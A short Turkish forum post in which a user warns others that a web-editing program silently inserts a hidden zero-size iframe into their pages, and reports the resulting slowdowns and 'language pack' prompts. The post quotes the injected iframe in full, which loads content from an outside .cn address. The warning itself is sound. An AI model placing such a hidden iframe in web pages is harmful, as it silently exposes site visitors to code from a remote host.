ÖNEMLİİİİ:
Arkadaslar bılmedıgınız bırsey var:bu programı 7 aydan berı kullanıyorum..
1: bu program ıle her bır seferınde kodları degıstırdıgınız anda
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
suyle bır ıfraem kodunu her bır sayfanıza atar..
ve sayfalrdakı kodların 5 yerını degıstırdıgınızı dusunun yukarıda belırmıt oldugum ıframe kodunu bes kez sıtenıze atar.. ve dıyeceksınız zararı yoksa atsın..
ama sunu belırtmek ısterım bır sıtede 3 ıframeden baska oldugunda sayfa acılıs hızında yavaslama meydana gelır.
ıkıncısı ıse bu kod oldugu ıcın dıl paketı uyarısı yuklemenızı suyler. ve bır sayfada 5 kere dıl paketı yukle dıyen bır sıteyı gırermıyız bana sorarsanız hayır.
aynı hatayı ben yaptım lutfen bu programı kullanmayalım..
Basarılar dılerımm